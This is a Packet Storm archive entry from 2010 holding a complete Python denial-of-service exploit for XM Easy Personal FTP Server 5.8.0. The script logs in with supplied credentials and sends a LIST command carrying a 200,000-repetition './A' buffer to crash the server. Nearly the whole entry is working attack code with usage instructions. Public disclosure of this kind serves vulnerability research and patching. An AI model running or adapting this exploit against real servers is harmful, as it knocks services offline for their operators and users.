XM Easy Personal FTP Server LIST Denial Of Service

2010-04-19T00:00:00
ID PACKETSTORM:88633
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-04-19T00:00:00

Description

                                        
                                            `# Exploit Title: XM Easy Personal FTP Server LIST   
# Date: 4/17/2010  
# Author: Jeremiah Talamantes  
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe  
# Version: 5.8.0  
# Tested on: Windows XP, SP2  
# CVE : N/A  
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.php  
  
#!/usr/bin/python  
print "\n#################################################################"  
print "## RedTeam Security ##"  
print "## XM Easy Personal FTP Server ##"  
print "## Version 5.8.0 ##"  
print "## LIST Vulnerability ##"  
print "## ##"  
print "## Jeremiah Talamantes ##"  
print "## labs@redteamsecure.com ##"  
print "################################################################# \n"  
  
import socket  
import sys  
  
# Define the exploit's usage  
def Usage():  
print ("Usage: xmexploit.py \n")  
print ("\n\nCredit: Jeremiah Talamantes")  
print ("RedTeam Security, LLC : www.redteamsecure.com/labs\n")  
  
# Buffer settings. Change as necessary  
buffer= "./A" * 200000  
  
def start(hostname, username, password):  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
sock.connect((hostname, 21))  
except:  
print ("Error: unable to connect to host")  
sys.exit(1)  
r=sock.recv(1024)  
print "[+] " + r  
#Send username to server  
sock.send("USER %s\r\n" %username)  
r=sock.recv(1024)  
# Send password to server  
sock.send("PASS %s\r\n" %password)  
r=sock.recv(1024)  
print "Sending the malicious chars..."  
# Send data to server  
sock.send("list %s\r\n" %buffer)  
sock.close()  
  
if len(sys.argv) <> 4:  
Usage()  
sys.exit(1)  
else:  
hostname=sys.argv[1]  
username=sys.argv[2]  
password=sys.argv[3]  
start(hostname,username,password)  
sys.exit(0)  
  
# end  
`